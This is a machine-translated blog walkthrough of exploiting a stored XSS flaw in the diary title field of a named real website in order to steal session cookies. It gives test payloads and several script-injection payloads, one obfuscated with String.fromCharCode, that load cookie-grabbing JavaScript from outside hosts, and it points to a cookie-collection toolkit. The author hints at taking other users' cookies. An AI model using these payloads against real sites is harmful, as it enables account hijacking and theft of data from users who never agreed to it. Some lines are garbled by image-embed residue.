XSS Vulnerability Instance Utilization

The previous article said a bit about the principle of XSS, I believe we have a certain understanding of the principle of XSS. Let's share some examples of XSS exploits today.

Environment:

Window 7 64-bit one set

Firefox browser in place

Extranet Cloud Server One (I bought it myself ...) ）

Can be an XSS site a horse

Get a set of JS code for cookies

Well, the above is what needs to be prepared, there is no external network cloud Server (external network IP) can baidu a bit of the open platform for XSS use, their own research how to use (my server is not public, too slag, just used to do the experiment cannot be made public ...) ）

And now we're going to step through the XSS exploits

0x00 .... Biubiubiu .... A chance to meet X's site

(Here the site is open, students can learn their own test, please do not sabotage, prevent from "the introduction of XSS to the police station")

#需要注册一个账号, x points are located in the Write diary section http://www.vbao100.com/

0X01 starts testing for possible x (normal thinking AH)

#经典测试代码 <script>alert (1) </script> #猥琐版测试代码 (need to view hidden in Firefox plugin Firebug is not easy for the administrator to find the relative pop window) console.log (1)

0x02 Ah ah ah ... Pop-up window (determine presence of XSS)

Insert test Code at the title of the diary click Preview (table (not) publish ... Published by admin will be audited)

650) this.width=650; "Src=" Http://s2.51cto.com/wyfs02/M01/84/46/wKiom1eLVEfwlhuPAAC8ee5E7fY264.png-wh_500x0-wm_3 -wmp_4-s_310496889.png "title=" 1.png "alt=" Wkiom1elvefwlhupaac8ee5e7fy264.png-wh_50 "/>

0X03 determine that there is an XSS ... Can take advantage of ... Hey hey heh ....

Again, the last time you talked about XSS paylaod

<script src= ' http://b.ioio.pub/xss/probe.js ' </script><svg onload=s=createelement (' script '); Body.appendchild (s); s.src= ' Http://b.ioio.pub/xss/probe.js><svg onload=eval (String.fromCharCode ( 115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,11 2,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,1 12,117,98,47,120,115,115,47,112,114,111,98,101,46,106,115)) >

When triggering one of the above tags will load the JS code from the remote, this is you can use by modifying the remote JS code to achieve different functions.

Everyone also saw the above connection that certainly wasn't mine .... JS from the Great God Gets the code for the cookie

Share:

Https://github.com/evilcos/xssprobe

Mainly contains three files, here to tell you what these three scripts are used to do not specifically describe the meaning of the code.

The first one:

This script is the code that needs to be remotely loaded JS to get the cookie (can be downloaded down to its own server or XSS platform) there is a need to modify the place http_server = "# This need to modify the address of their server and accept data php file

The second one:

This is the above mentioned the need to accept data php file This file does not need to be modified. The effect is to write the accepted data to a third file.

The third one:

This is where you show cookies after you obtain a cookie. The first file gets the cookie and then the second file is written to this file by a second file.

0X04 began to take advantage of ... Construction Exploits Code

<script src= ' http://xx.xx.xx.xx/xsstest.js '/> (xx.xx.xx.xx is my cloud server)

Constructed and tested for success .... Test my own application for the account .... (How to get someone else's cookie depends on your own thinking, you want a private messages I will tell you ....) ）

Ok... Now look at ....

650) this.width=650; "Src=" Http://s5.51cto.com/wyfs02/M00/84/47/wKiom1eLWyWTW_PsAAHLMOtU7Vo311.png-wh_500x0-wm_3 -wmp_4-s_2476273102.png "title=" 2.png "alt=" Wkiom1elwywtw_psaahlmotu7vo311.png-wh_50 "/>

Now we have successfully obtained my own cookie .... O (∩_∩) o~

(Again, please do not destroy the students, only for testing use ...) ）

This article is from the "Creative Pilgrim" blog, so be sure to keep this source http://dearch.blog.51cto.com/10423918/1827201

XSS Vulnerability Instance Utilization